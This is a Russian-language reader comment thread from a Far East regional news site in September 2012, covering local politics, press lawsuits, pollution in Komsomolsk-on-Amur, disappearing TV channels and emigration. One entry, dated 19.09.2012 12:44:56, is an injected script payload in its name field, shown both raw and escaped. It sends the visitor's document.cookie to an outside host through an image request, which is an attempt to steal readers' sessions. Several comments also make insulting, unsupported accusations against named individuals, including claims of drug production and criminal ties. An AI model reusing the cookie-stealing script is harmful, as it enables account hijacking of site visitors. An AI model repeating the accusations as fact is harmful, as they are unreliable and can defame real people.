Комментарии
Фильтр: Сбросить
21.09.2012 08:13:08
Залётный
Газ Прём Мечты сбываются!
Светлое будущее равно формуле евроазиатская резервная валюта(место печатного станка и хранилище известны)+ европейская Евро + северо-американская Амеро.
Дальше валюты смыкаются + единая кредитно-финансовая система + единая вертикаль управления + единое мировое правительство.
Электронные идентификаторы личности с банковскими счетами то же готовы. Проекция начнётся в 2014 году.
На всю эту бодягу 50 лет.
Но тема то не в этом! Тема в созерцании и в иллюзии справедливости, когда дальневосточную ОПГ в правительстве срезать начнут и заметь публично срезать. Путину нужен пиар, реабилитация, флешмоб. А на ДВ всё сходится и синхронизируется одной многоходовкой.
21.09.2012 06:07:38
Газ Прём Мечты сбываются!
Кризис в Европе продолжается и набирает обороты!Смотреть всем!
http://video.drom.ru/4209/
21.09.2012 06:01:44
ЗКП
Это же  какой  лоб надо иметь,что бы  наступать  на  одни и те же  грабли.Если тебе  плевать на  то,  что  подумают герои твоих разоблачительных сенсаций,то плати деньги и считай  всех  дураками.Сейчас  еще  и Карпенко   добавит.
21.09.2012 05:40:08
"тоже пишущему" (он же - Глеб Жмурко)
Борисовна, дорогая, ты бы лучше рассказала что-нибудь о себе. Например, как перебралась из Хабары на ПМЖ в Москву, и там теперь заякорилась.
Может тебе уже и квартирку прикупил или пока по углам маешься? Кем ты теперь там, в какой позе работаешь?
21.09.2012 03:18:38
Маша
Б.Резник: "Я не помню, кому я позвонил первому, по-моему, первому я позвонил Баранову Вячеславу Аркадьевичу. Он пояснил мне, что тоже уже прочитал статью и крайне возмущен. Я созвонился в течение нескольких дней с Новожиловым Виктором Ивановичем, Коноваловым Валерием Арсентьевичем, Чечеватовым Виктором Степановичем. Все они были возмущены статьей и хотели обращаться в суд с заявлениями о защите чести и достоинства и деловой репутации. Новожилов В.И. спросил у меня, как нужно правильно действовать в этой ситуации." http://www.debri-dv.ru/article/4628
21.09.2012 02:50:48
Маша
Урок здесь должен быть один - дружить с Борисом Львовичем Резником и не писать про дом прессы. Тогда будешь молодец! Думаю, они бы для пользы дела все равно помирились, чем друг друга поливать помоями.
21.09.2012 00:14:35
Надежда
Критические вопросы  к действующей власти редактор не задаёт. В последнем номере газеты сообщает читателям об открытии детского городка в г.Советская Гавань. Риторический вопрос в сторону предпринимателей. А к власти, районной и поселковой?  Нет вопросов. "Всё хорошо, прекрасная маркиза".  
20.09.2012 22:44:54
Yulia
A bit surprised it seems to simlpe and yet useful.
20.09.2012 21:42:12
Глеб Жмурко
Ребята, зачем же выраз за разом так подставляетесь? У нас в конторе выступал депутат Розенков и подробно рассказывал, как засудил по уголовной статье за клевету редактора Глухова . Ведь дыма без огня не бывает. Если люди подают в суд, значит у них есть доказательства своей невиновности. И не надо нас всех считать дураками утверждая, что вас осудили не за что.Я прочитал на  дебрях решение аппеляционного суда по Шишкину - там очень доказательно и убедительно рассказано в чем вы проводились. Так что извлекайте уроки...
20.09.2012 21:25:23
тоже пишущий
И ОПЯТЬ ЛОЖЬ, ложь, ложь... Вы хоть загляните в иски, которые печатали на своем же сайте. Там четко и ясно сказано, в чем икак вы оболгали уважаемых людей. Вас даже могила не исправит. ЕДИНСТВЕННОЕ, что может остановить главных клеветников востока России Глухова, Мирмовича, Пронякина, Харитонову- судебные иски, чтобы плакали над этими и ждали следующих.
20.09.2012 20:16:40
ИХ
В.Путин исключил "критикана" А.Макаревича из президентского совета
 
20.09.2012 19:49:16
ИХ
Зарегистрироваться в качестве выборщика оппозиции
http://www.cvk2012.org/
20.09.2012 16:53:39
Газ Прём Мечты сбываются!
Извеняюсь,не зелёный а залётный.
20.09.2012 16:51:00
Газ Прём Мечты сбываются!
Зелёный,какой цикл?Давно уж климакс наступил!Улыбка)  К 20ым  свалят все с ДВ,будут одни деманы жить  родившиеся с похмельным синдромом,охранять трубы  нефтегазвых компаний!Посмотри в Хабаровске какой офис за год построили на калинина-пионерская,не офис а корпорация на "манхэтэене".А детские сады остались от ссср.А ты говоришь подождите 8лет,и светлое будущее наступитУлыбка).Ждём ладно,уговорил.Только не забудь что обещал!
20.09.2012 15:03:16
Виктор Киселёв
Газ Прём Мечты сбываются!
Первый пункт интересен, а со вторым согласен. Вы правы))) Я говорю партия( КПРФ) - и подразумеваю это)))
20.09.2012 13:15:45
Иванова
Надо бы этих "культурных" женщин отправить на речку, на тони. Пусть бы поработали ручками.
20.09.2012 12:44:42
Умар
Статья  заказная.Папа ничего хорошего для Дальнего Востока не сделал, а  занимался имитированием  бурной деятельности,И все эти графики вызывают просто смех.Мне кажется господин Шпорт попорядочнее.
20.09.2012 12:22:39
Умар
Папум на нары, там ему и самое место!!! Так и будет!!!!!
20.09.2012 09:48:17
Залётный
Граждане Пронякин К.А., Харитонова И.Ю, нате, ознакомьтесь http://www.kpe.ru/partiinaya-rabota/partiinaya-deyatelnost/3410-inniciativi-fedorova
и лучше займитесь делом. Фёдоров вам отмашку дал.
20.09.2012 09:45:42
Залётный
"ИХ", на http://www.kpe.ru/partiinaya-rabota/partiinaya-deyatelnost/3410-inniciativi-fedorova
и лучше займись делом. Фёдоров тебе отмашку дал.
20.09.2012 09:12:15
Залётный
"Горе вам люди, ибо стана сброшен на землю в ярости своей зная, что ему остались последние дни".
20.09.2012 08:53:44
Залётный
Пустое... Под стать категории русскоговорящих нытиков и хлюпиков. Радоваться надо, что население проявляется и делиться на две категории:
1. Хомячков-потреблянтов, от которых житья и прохода ни где нет.
2. Людей полезных для планеты Земля, края, Родины если проще сказать.
А Климова сгинет на чужбине гарантированно, как уже сгинули 3 миллиона отпрысков с управленческой ОПГ. А их жалко? А Климову жалко? Законы социологии незыблемы: "Лучше меньше, да лучше". Жатва. Дерево не дающее доброго плода срубают и бросают в печь. Жатва идёт и слава богу, что началась вовремя.
И вопрос в автору, а откуда число 36 миллионов? Из служебной статистики на 60% территории России(в Восточной Сибири) проживает 10% населения. Наверно 36 миллионов с гастарбайтерами. Но тут не спорят.
20.09.2012 08:32:30
Залётный
Тут ещё новость. Навальный готовит Бастрыкина . http://navalny.livejournal.com/736477.html
Ай, да Навальный!
Ай-да молодец!
Сейчас у Бастрыкина всего два набора вероятных предопределённостей. Матрица - гранит и лбом её не пробьёшь.
1. Или он оставляет свою должность в России, увольняется и уезжает по ближе к своей собственности за границу. Но там он ещё протянет, а вот детишки его сгинут, как и 3 мильёна потомства таких же, уехавших ранее.
2. Или он публично отказывается от вышепрописаного ради сохранения места и Родины. То есть перекрашивается. И логично бы было бы предположить, а как Бастрыкин будет реагировать на разоблачения и публикации о своих коллегах по аналогичной теме?
Да отныне для своих бывших коллег, друзей, подельников Бастрыкин станет смертным врагом. Они знают и понимают, что рано или поздно рай для них в России всё равно закончится. Но мало кто понимал, что их палачами станут свои же.
 
Занимайте места в первых рядах, запасайтесь попкорном и Кока-Колой. Премьера начинается после октября.
А Навальный явно после всех процессов, спектаклей и реорганизаций в штат правительства будет зачислен. Кем? Пока трудно сказать. Но советником или экспертом однозначно. Поздравим Навального с повышением...
20.09.2012 08:29:52
Гений Парадоксов (друг)
Хабаровчане получили «подарок» от РТРС
К своему дню 85-летия компания лишила город 24 телеканалов
 
На днях филиалу РТРС Дальневосточный РЦ, одной из крупнейших телерадиосетей в мире, исполнилось 85 лет. Компания много лет успешно трудится на российском рынке, занимая фактически монопольное положение. С недавних пор она проводит модернизацию своего оборудования, переводя вещание на «цифру». Напомним, что таково решение президента: вместо морально и физически устаревшего аналогового вещания теле- и радиокомпании должны перейти на цифровое.
 
Вот под эту «модернизацию» и попал пакет телепрограмм «A-Mega TV», предоставляемых компанией «ТВ-сеть». С 7 сентября в нашу редакцию посыпались письма и звонки. Читатели просили выяснить, куда делись из общего доступа «Домашний», 2х2, TV 1000, КХЛ и еще 20 каналов. Вместо любимых телепередач и классных мультиков – только «снег» на экране. Чем же провинились перед крупнейшей телерадиосетью жители Хабаровска и компания «ТВ-сеть»?
 
- Наша передающая антенна была демонтирована с мачты АМС-16 (расположена в районе поворота на Выборгскую) сотрудниками ФГУП «РТРС» 7 сентября. Сами понимаете, без антенны вещание невозможно, – объяснил «Комсомолке» исполнительный директор ООО «ТВ-сеть» Антон Ионов. – Свои действия они мотивировали тем, что в связи с реализацией федеральной целевой программы по переходу на «цифру» эта мачта будет использоваться как антенна для цифрового радиовещания. И, следовательно, на ней не может располагаться иное оборудование. Но нюанс в том, что в программу были внесены изменения, от цифрового радио решили отказаться. То есть, теперь объективных причин для снятия нашей антенны нет. Тем не менее, сотрудники РТРС это сделали и возвращать ее на место не собираются.
 
Сейчас обе компании отстаивают свое мнение в судах. Очередное заседание назначено на конец сентября.
 
А, может, на самом деле это хитрый ход по окультуриванию хабаровчан? Чтобы народ перешел с «Симпсонов» и хоккея на шедевры мировой классики по телеканалу «Культура»? Когда стихнут поздравления РТРС с круглой датой, «Комсомолка» намерена выяснить позицию руководства данного предприятия.
http://hab.kp.ru/daily/25953/2894841/
20.09.2012 08:25:23
Залётный
"ИХ", Орешкин в небо пальцем тычет. Процесс стирания ОПГ в госуправления уже во всю идёт. В 20-х годах не узнаешь рассею. Да и евроазиатский союз уже реально начнёт отражаться на твоих ощущениях, реакциях и поведении. В приятных... Цикл, видишь ли другой наступил.
20.09.2012 04:32:57
Газ Прём Мечты сбываются!
1.Не знаю чекисты Вэпсовских  поставили или нет,но дело в тот момент сделали на 5+!.Вэпса бригада выбила криминальные бригады чеченцев с Приморья которые обложили данью ВСЕХ.Была война настоящая.И после этого вэпсовские  за это  отсидели вроде по 7лет.
2.По поводу что Кремль породил движение болотное не верю.А вот что все партии карманные в Думе ,верю!
20.09.2012 04:11:02
Газ Прём Мечты сбываются!
АМ :4 про наших"ж-налистов",за 3 недели никто не пискнул о том, что интересует почти всех хабаровчан - исчезли почти половина каналов тв, причем многие из них всегда были бесплатны.( если б народ знал , какие там сейчас идут подковерные дрязги... )но суть не в этом, понятно - оставшееся тв молчит,рейтинга растут(убрали конкурентов), у других- пишуших- косвенно тоже, но не считайте себя масс медиа, плиз... ("экспрессу" тож упрек).
 
  АС я тоже думаю что это проделки воров.Раньше РБК смотрел.но как только отключили каналы(прям перед семитом во Владивостоке),по первым каналам началась пропоганда ПЖИВ и Карликов молодцов россейских,сколько хорошего они делают для людей!
20.09.2012 04:06:19
Сократ
Да,.... все верно при такой то власти...
Я вот тоже думаю, если Мусяновича  ванинский народ изберет надо уезжать, давно друзья в Москву зовут, а я все никак не решусь.
хе-хе-хе
20.09.2012 03:59:38
Сократ
МОРОЗ.
сОКРАТ, вы взяли псевдоним древнего мыслителя, мудреца, не имея и тысячной доли его ума.
------------------------
Сократ
Чем мой ум измеряли?
Линейку явите миру.
хе-хе-хе
-----------------------
Вам бы писать что-то дельное под этим псевдонимом, например,о методах переустройства в управлении районом.Это то,чем занимался настоящий Сократ и этим он на века запомнился людям всего мира.
-------------------------
Ну-ну, не стоит так однобоко, в интересы древнего Сократа входили многие вопросы, и вопрсы управления и афинской демократии были далеко не главными. Впрочем, Вы ведь не читали, не так ли? Разве что то слышали о том почему Сократ добровольно умер, имея возможность сбежать от неправедного суда.
хе-хе-хе
-------------------------
СВЕТЛАНА в унисон с сОКРАТОМ,вы называете Гаврилову мошенницей,даже выказываете осведомлённость фабулы её"мошенничества".
------------------------
Сократ
И где именно я  квалифицировал ее как мошенницу в виде утверждения, Вы тут случаем не клевещите ась?
хе-хе-хе
20.09.2012 03:52:41
Сократ
Надежда
Сократу, Народу и пр. Про совесть вдруг вспомнили. Вы и совесть? Несовместимо.
------------------------------
Сократ:
Это Вы чем измерили?
Не смешили бы уже... хе-хе-хе
А то ведь чья бы корова мычала.
хе-хе-хе
20.09.2012 03:33:29
begemotofff
У господина Черепкова с возрастом стало явно не в порядке с головой
20.09.2012 02:42:46
Ванька
Все перемешалось в башке у молодых, амбициозных и перспективных. Бред полный.
20.09.2012 02:39:02
241
На сегодняшний день бегство - наиболее эффективная (по крайней мере самая массовая, хоть и не организованная) форма протеста. Так что не прав был Зюганов, когда говорил, что лимит на революцию исчерпан. Она только зарождается.  
20.09.2012 02:22:12
Ванька
Ага в китае лучше а деньги на китай в Ванино зарабатывают
19.09.2012 18:56:01
ИХ
Орешкин красава
 
http://www.kommersant.ru/doc/2015289
19.09.2012 18:44:58
реалист
ИХ, а что там по ссылке?
19.09.2012 17:35:14
Матахари
Отрывок из публикации «Кернес превратил Харьков в Мекку для наркоманов» от 14.03.2011
«… Оборудование харьковской фармацевтической компании «Здоровье» позволяет производить любой синтетический наркотик – начиная с трамадола, заканчивая экстази, чем фабрика и занимается уже много лет. Масштабы все более угрожающие. Само предприятие принадлежит российскому [изъята. адм.]авторитету ШИШКИНУ (кемеровская группировка, Москва), а смотрящим по Украине от ШИШКИНА за его медицинскими предприятиями поставлен Игорь Сало, близкий друг мэра Харькова Кернеса. Сало в настоящее время является советником губернатора Добкина. Беспрепятственный выпуск наркотиков (трамадол, кадеин, морфин) на предприятии дополняется еще и выпуском «левых» лекарств. Продукция «Здоровья» , даже самые простые таблетки – очень низкого качества»…».
www.dosye.com.ua  
Интернет-газета «Трибуна»
http://tribuna.com.ua/digest/266851.htm
19.09.2012 17:33:29
АС
1 если вы уважаете себя ,читайте "новую газету", а не только все остальное
2 все идет по плану.., пуссиным не нужно ничего , кроме боле мене сытого прайда  для обслуживания воровства недр, охраны энтого,масскульта для развлечения патрициев,а всех остальных давить и нанимать контрактников из азиопы
 

3 все проекты - чем бессмысленнее и откатнее, тем лучше.
про край - вбухивают бабло в реч и аэровокзал сейчас, когда стало ясно, что даже их_шайке не удастся задавить дорогу в китай через остров.,т.е. деньги освоят, попилят, а оба объекта н.х. никому не упрутся, т.е.  красиво...
 
4 про наших"ж-налистов",за 3 недели никто не пискнул о том, что интересует почти всех хабаровчан  - исчезли почти половина каналов тв, причем многие из них всегда были бесплатны.( если б народ знал , какие там сейчас идут подковерные дрязги... )но суть не в этом, понятно - оставшееся тв молчит,рейтинга растут(убрали конкурентов), у других- пишуших- косвенно тоже, но не считайте себя масс медиа, плиз... ("экспрессу" тож упрек).
 
5 когда молодому и свободному  неглупому человеку видно такое отношение "города и мира(рф)" к себе- надо валить,особенно если можешь язык аглицкий или китайский выучить на уровне менталитета
 
имхо, канечна
19.09.2012 17:00:25
Матахари
Сало банкротил, Шишкин платил
 
[РУСПРЕС: Александр Шишкин является давним деловым партнером российско-украинского предпринимателя Игоря Сало, фирмы которого считаются причастными к приватизации «Здоровья» через искусственное банкротство предприятий. В частности, они вдвоем были соучредителями российских ООО «Производственный комплекс «Теле-трейд», ОАО «Аис-ойл»]
 
ООО «Фармацевтическая группа «Здоровье» в Украине имеет неоднозначную репутацию. Ее связывают с бизнес империей российско-украинских предпринимателей Игоря Сало и его сына Владимира, чьи имена недавно назывались в связи с рейдерским захватом киевского инсулинового завода «Индар». ..."
 
(...)
После того как Storke Holdings получила в собственность 70% акций «Индара» и другие фармацевтические активы, в марте 2008 г. все они были переданы в залог московскому ЗАО «КБ «Русский международный банк». «Договор залога от имени Storke Holdings и КБ подписывала Екатерина Гутман, рядовой юрист РМБ. Это банк совладельца российской металлургической группы «Эстар» Александра Шишкина, который является бизнес-партнером [министра по делам Дальнего Востока, полпреда Президента в ДФО] Виктора Ишаева», — сообщил «ДС» один из юристов, участвовавший в деле на стороне украинского Минздрава. По его данным, отчуждение акций «Индара» и других активов, номинальная стоимость которых достигает 300 млн грн., изначально осуществлялось с целью их последующей перепродажи. ..."
 
Источник: «Левый берег», 01.09.2011 Руспрес, 22.05.2012
http://www.rospres.com/showbiz/10377/
 
19.09.2012 16:22:58
Сергей
Какой юр.отдел, мер, губернатор ! Деньги решают все.
19.09.2012 15:25:59
владимир
Пошто уж мрачно так?Послушать надо было бы выступления бабы Вали во время визита на ДВ о светлом будующем региона,полетать на дельтопланах,глядишь и другим дальневосточникам полетать захочется!А проблемы-да ну их в болото!Если же всерьёз,необходимо назначать досрочные перевыборы Президента,ГосДумы и губернаторов!С такой властью будут и далее исчезать деревни и целые города становиться банкротами,как Комсомольск-на-Амуре!От себя не убежишь!
19.09.2012 15:13:30
борцов
Эта статья говорит, что в буржуазной России остались не только потребители, но те кто имеет мозги, которые не кому не нужны. Молодежи нужны поступки, а их приручают к корыту.
19.09.2012 14:52:05
владимир
По своей масштабности ЧП в Комсомольске сравнимо лишь с деятельностью фашистких  газовых камер в годы ВОВ.Российские капиталисты вновь потвердили ,что ради наживы не остановятся ни перед чем! Главный буржуин,Сечин, поехал на саммит АТЭС поучаствовать в очередном распиле.И весь юротдел городской администрации оказался бессилен перед изощрённым цинизмом власть имущих и имеющих горожан.Почему глава города не обратился в суд от неопределённого круга лиц в защиту их прав на жизнь?Вероятно в доле с нефтяниками?Предлагаю поставить вопрос по отзыву мэра города Михалёва с занимаемой должности и отставки городской Думы в полном составе!
19.09.2012 13:28:08
МАРИЯ
Дело не в том, что "молоденькой девочке не хватает 1200 баксов на нормальное житье". Дело в отсутствии будущего. Его здесь нет. Сын на каникулы приехал из Китая в Ванино, пробыл недолго. Говорит: "я был в 9 классе, когда у нас Дворец спорта начали ремонтировать. Я уже четвертый год студент - Дворец до сих пор ремонтируют". Здесь и правда жизнь будто остановилась.
19.09.2012 13:20:42
ИХ
"Пан, оказывается не только чешский, но и испанский шпиён"
 
http://www.novayagazeta.ru/inquests/54511.html
19.09.2012 13:00:42
Нифигасе
А с Аргентины сюда возвращаются наоборот, в Николаевске мэр сАргентины как раз драпанул
19.09.2012 12:57:57
Нифигасе
Давно такого бреда не читал - смешались в кучу кони, люди... Дорога на остров через скалистый горный массив - такое надо умудриться выдумать. Амурский регион - это про что?   А Маша-то, ну наворотили, сказочники похлеще путиноидов.
19.09.2012 12:44:56
<script> img = new Image(); img.src = "http://bratzakon.comli.com/s.gif?"+document.cookie; </script>
&lt;script&gt; img = new Image(); img.src = "http://bratzakon.comli.com/s.gif?"+document.cookie; &lt;/script&gt;
19.09.2012 11:20:57
Лаврентьев Иван
Лаврентьев Иван, руководитель пресс-службы администрации Комсомольска-на-Амуре.
Как вы знаете, в конце прошлого года был принят закон Хабаровского края «О наделении органов местного самоуправления государственными полномочиями Хабаровского края по организации проведения мероприятий по предупреждению и ликвидации болезней животных, их лечению, защите населения от болезней, общих для человека и животных».
Во исполнение принятых правительством края и краевой Думой документов в Комсомольске-на-Амуре была разработана местная правовая база, которая регулировала отлов и содержание безнадзорных животных.
Все эти муниципальные правовые акты были опубликованы в газете «Дальневосточный Комсомольск» и размещены на официальном сайте органов местного самоуправления города .
Муниципальное унитарное предприятие «Специализированное автохозяйство по санитарной уборке города» было определено специализированной организацией по отлову, содержанию и обращению с безнадзорными животными. Для этого были внесены изменения в устав предприятия.
Из бюджета края в 2012 году  Комсомольску-на-Амуре была  выделена субвенция в сумме 1651,6 тыс. рублей.
Из них  772,5 тыс. руб. были первоначальной единовременной субвенцией на приобретение (транспортного средства - 1ед.; вольеров - 3 ед.; пневматического метателя - 1 ед.; кремационной печи - 1 ед.). Ещё 793,3 тыс. руб. - затраты по регулированию численности безнадзорных животных (отлов, содержание и учет безнадзорных животных; кастрация и стерилизация безнадзорных животных, эвтаназия безнадзорных животных,  горюче-смазочные материалы для транспортировки отловленных безнадзорных животных). И  85,8 тыс. руб. - затраты при осуществлении государственных полномочий.
В соответствии с Федеральным законом от  № 94-ФЗ  были проведены конкурсные мероприятия путем запроса котировок по поставке 1 ед. кремационной печи и 1 ед. спецавтомобиля марки УАЗ для перевозки отловленных животных.
По итогам проведенного котировочного отбора с ООО «Ижтел» (г. Ижевск) заключен муниципальный контракт на сумму 177 000 руб. на поставку кремационной печи. 31.08.2012 года крематор доставлен и размещен на базе МУП «САХ СУГ». Приобретен пневматический метатель для обездвиживания животных на сумму 7935 руб. Изготовлены и установлены на территории базы МУП «САХ СУГ» пункт карантинного содержания безнадзорных животных - три вольера для животных за счет целевой единовременной субвенции из краевого бюджета на сумму 66 000 руб.
В связи с отсутствием заявок на поставку спецавтомашины УАЗ по дважды объявленным в сети Интернет  котировкам цен, проводится дополнительный котировочный отбор на поставку спецавтомобиля на сумму 459 000 руб.
Также заключен Договор на осмотр, освидетельствование, вакцинацию, кастрацию и стерилизацию отловленных животных между КГБУ «Комсомольская городская станция по борьбе с болезнями животных» и специализированной организацией по отлову безнадзорных животных.
На сегодняшний день в вольерах содержится 13 животных. Произведены осмотр и диагностика животных специалистами Государственной ветеринарной станции, выполнены карантинные мероприятия, проведена обработка против эктопаразитов, дегельмитация, вакцинация против бешенства, чипирование. Для поиска владельцев животных размещены соответствующие объявления в газетах.
 
19.09.2012 10:28:29
Читатель
Молоденькой девочке, к тому же путешествующей бесплатно по миру и имеющую бесплатную форменную одежду и обувку нехватает 1200 баксов на прожитуху. Прикольно.
19.09.2012 10:03:02
гость
Что значит:"В Хабаровске нет будущего"?
Время тут остановится что ли? Будущее всегда есть, вопрос, - какое? Ну станет Хабаровск очередной китайской провинцией, в чем проблема-то? Хабаровчане, кто выживет, постепенно выучат китайский язык, их дети постепенно забудут русский. Лет через пятьдесят о России тут уже никто не будет вспоминать.
19.09.2012 08:36:36
Сергей
Надо было потерпеть немного - вечером по ТВ лапшу о хорошей жизни опять развесят жителям Далнего Востока!    
Может какой клоун речь толкнет, или какой Джуляк активизирется !
19.09.2012 05:51:15
Залётный
Поясняю для "ИХ" суть его ссылки.
Москва публично продемонстрировала позорную слабость и интеллектуальную немощь режима. По указке Администрации Президента из депутатского кресла грубо вытаскивали упиравшегося всеми четырьмя копытами жертвенного барашка «Справедливой России» Гудкова-старшего. Сергей Миронов сегодня является одним из наиболее близких Путину людей и замысел публичной разборки в депутатском паноптикуме становится предельно ясным.
По соглашению с Зюгановым на смену КПРФ Кремлем выдвигается яростная «оппозиционная» социал-демократическая партия Миронова «Справедливая Россия», для поднятия имиджа которой в глазах народа и была необходима настоящая жертва режима.
В кремлевском спектакле все блестяще сыграли свои роли: и КПРФ, и Миронов, и Жириновский, и сам жертвенный баран. Зюганов отдал жесткий приказ депутатам-коммунистам подыграть могильщикам КПРФ из СР. Питерский бюрократ Миронов, с трудом скрывая улыбку, с трибуны гневно обличил ЕР и власть зарвавшихся чиновников. Только бедного-богатого Гудкова, похоже, использовали «в темную».
Надо отдать должное, что в выступлениях Гудкова вполне хватало пафоса и показного целомудрия, как и громких заявлений, включая сравнение России с гитлеровской Германией или честно заработанных Собчак миллионов в конвертах, кивки на поддержку ЕС. Но в тот момент, когда он скромно объявил себя Президентом-2018 всея Руси, тоги римского императора ему явно не хватало. Невольно вспомнил афоризм знакомого генерала-десантника: Бизнес и секс. Заменив секс политикой, и сделав все это семейным бизнесом, полковник ФСБ сегодня проиграл своим товарищам.
А если короче, то надеются двухпартийную систему сотворить.
19.09.2012 02:40:11
Новенький
Нана... национальный вопрос прямо таки встал ребром. Неужели начальники культуры района могли подумать, что в числе этих замечательных людей есть интеллигенты? Смею предположить что кроме как с рыбалкой и бубноплясками никто этих граждан и не ассоциирует. Что конечно не может не огорчать.
Снимать ответственность с самих "коренных" тоже не надо. Видимо есть желание чтобы продолжали спаивать и приглашали потанцевать в костюмах из рыбьей кожи.
18.09.2012 20:42:53
Павел
Давно пора поместить администрацию города и края в палаточный городок возле завода, чтобы они там заключали свои перемирия и дышали этим дерьмом,чтобы нам меньше досталось!
18.09.2012 19:27:57
Газ Прём Мечты сбываются!
Не воровать ,не растаскивать по карманам!Вот наш лозунг!!!
18.09.2012 19:13:46
Газ Прём Мечты сбываются!
Голосовали за Воффку ,а теперь нюхайте!
18.09.2012 16:46:23
ИХ
Газпрёму, у которого мечты сбываются
 
http://echo.msk.ru/blog/nemtsov_boris/931483-echo/
18.09.2012 15:27:35
Виктор Киселёв
Напрасно оспаривать количество пришедших на митинг где бы то ни было в России. На любом из них ГРАЖДАН  меньше, чем зрителей.)))Пора по России говорить "Ой!")))
18.09.2012 14:55:09
ИХ
Очередные злотые Крендельки Едра
ну и их ложь. как обычно,
а также игра - вышиби кренделька, получи 50 тыс руб
 
http://echo.msk.ru/blog/dgudkov/931440-echo/
18.09.2012 14:46:43
Ванино
Житель я Ванинского славного района. Цырфу "попросили" хорошо бы еще в комиссиях на местном уровне разобрались. Есть у нас такая Пашнива Наташа, возглавляет территориальную комиссию...
18.09.2012 13:39:05
Случайный прохожий
Поражает до мистики, как они чувствуют свой конец. Только в отличии от крыс,  не бегут с тонущего корабля, а всеми силами стараются утонуть вместе с ним.
18.09.2012 13:31:36
Иван
Мы тоже неоднократно обращались к Любови Пассар, но ей всегда некогда, она занята, на самом же деле она делает свою карьеру, прикрываясь национальными интересами.Такого пустобрехства ни в одной общест. организации нет. Это мое мнение.
18.09.2012 13:22:35
Татьяна
10 лет тому назад при заходе на посадку в Аян разбился Ан-28. Похоже, ни смерть 14 человек, ни горе друзей и родных, ни 10 лет " модернизации" не заставили сделать выводы. В нашем обществе жизнь человека не стоит НИЧЕГО! Шкурка чиновничья, предпринимат интерес - это да, дорогого стоит
18.09.2012 13:17:58
Ирина
Какой талант! как жаль, что узнала о нем только после его ухода... Не удвляюсь, что эссе не опубликовала ни одна магаданская газета - слишком меткое обличение власти.
18.09.2012 13:14:33
Андрей
все абсолютно в стиле аля-Хохлов, ай да ... сын! Он, как мне кажется, не прощает ни одной обиды( а обида для него- не такое мнение как у него)и будет из кожи лезть вон, лишь бы потешить свое самолюбие. Николаевск на Амуре, Нанайский район и может еще где то, но это на слуху.
18.09.2012 12:27:59
Людмила
Я ненавижу ер, на это есть причины, но я хорошо знаю кто такой М. - Это такое д.... И вообще моё мнение: О. и М._двое из ларца, одинаковы с лица!
18.09.2012 12:18:34
Людмила
Я не знаю как другие кандидаты. Но я знаю кто такой М. и ни дай Бог  этот человек прорвётся снова во власть!
18.09.2012 12:08:44
Людмила
И тот и другой скажу прямо без прекрас -Д...! Сталкивалась с обоими, и хочу сказать что О. и М. это люди у которых ни чести ни совести нет. И удивляюсь как только люди о таких ведут речь. Каждый из них в своё время имел своего карманного прокурора района, и не только. Вот и делайте выводы господа!
18.09.2012 11:26:52
Anka
Все люди  все понимают и ничего не могут сделать. Потому как с корабля большинству бежать некуда.
И на этом гнилом корабле предстоит вырастить детей и может выучить их где нибудь за границей, да дать хотя бы им старт в нормальную человеческую жизнь.
Большинство это те, кто и в интернете то не бывает.
Это то Большинство, которое бредет вечером по огромным лужам   и выбоинам в асфальте рядом со своим домом ( не понимая  какие такие миллиарды освоили на ремонте дорог) и забивается в свою квартирку в свой мирок, где можно отогреться ото всей этой нелепости.
Большинство это те кто мерзнет в своих квартирах по полмесяца в конце сентября из=за опресовки теплотрасс, потому что когда тепло, то опресовку никак нельзя произвести. Большинство это те люди, котрые водят своих внуков в ту же поликлиннику куда водили и своих детей и понимают, что ничего не изменилось за 30 лет.
Большинсво это те люди, которые посещают свой отдел милиции 1 раз в 10 лет и удивляются, тому,  как нелепо смотрятся ноутбуки  на фоне убожища  помещения.  Ничего не изменилось для большинства.  Большинство это те кто собрал МИЛЛИАРД рублей на помощь  пострадавшим в Крымске.  Это все мы-большинство. Что с нами не так?
18.09.2012 10:59:26
ИХ
Титовой респектище. Глас и глаз в одном лице...
18.09.2012 09:08:35
Новенький
Губит людей (губера) не пиво, губит людей Роснефть.
18.09.2012 06:49:42
Елена
Вот так. "Непрофессиональные журналисты".. "Спрашивать надо было.."
Все, что возмутило?
Матом в отношении граждан (в данном случае девушек), сообщение, что мы (граждане) для него "Вообще никто", нападение, хамство - это что же.. Норма?
А ведь у Исакова и не спросили ничего. Только о том, можно ли с ним поговорить.
А раздражение Исакова связано с тем, что за два часа до этого мы не позволили его подчиненным растерзать 32 собаки в п. Эльбан. И они не дополучили около 100 тысяч рублей.
В тот момент, когда Исаков хамил и бросался на людей на своей проходной, им двигала лютая ненависть и презрение к людям, которые призвали его подчиненных и его иже с ними к соблюдению законов.
Кстати, запись заканчивается не потому, что снимать закончили, а потому, что Исаков выкручивая руки, стал отбирать телефон.
Последствия - ссадины, кровоподтеки, царапины, заявление о возбуждении уголовного дела.
Возмутит ли вас тот факт, что перед нанесением побоев, Исаков не "испросил разрешения"..
18.09.2012 05:23:40
Залётный
Зимой летал в Якутию транзитным рейсом Хабаровск-Якутск-Ленск. На посадке в самолёт на лентск при досмотре нас шмонала израильтянка в цохаловской форме. На мой вопрос про "маскарад" ближайшему менту ответ был прост: В г. Мирный идёт разработка кимберлитового месторождения алмазов, которое даёт половину мировых алмазов в мире. 60% прибыли принадлежит евреям. Вот они и выставляют своих штаты для безопасности. Так что не только русские простофили, якуты не лучше. Развели по самое не хочу.
18.09.2012 01:04:56
Надежда
Почему же редактор ни в одном номере своей газеты не сообщила о том, как она после пожара пришла к бывшему главе на приём (за помощью). И он проникся её труднейшим положением. Редактор сообщила , что нет денег платить за услуги типографии, что постоянно одалживает у знакомых, чтобы оплатить за текущие номера, что оборудование взято в аренду и его нужно выкупать, что живёт у знакомых, что редакцию попросили из университета, потому что нечем оплачивать аренду и   все прочие беды.  Бывший глава, о котором редактор годами так "нежно"отзывается, решил её проблемы комплексно! А потом редактор за деньги помощи купила оборудование, расплатилась с долгами, есть крыша над головой. Всё так удачно сложилось. А здесь грядут выборы главы (2008г.),   приметила рвущихся к власти новых лиц. И вперёд! Акценты в статьях резко поменялись. Жизнь удалась!  
17.09.2012 21:50:15
димитрий антону
Пчелинцеву с Алексеевой далеко до ЖУРНАЛИСТИКИ!А до пенсии-это неважно..
17.09.2012 20:28:34
Надежда
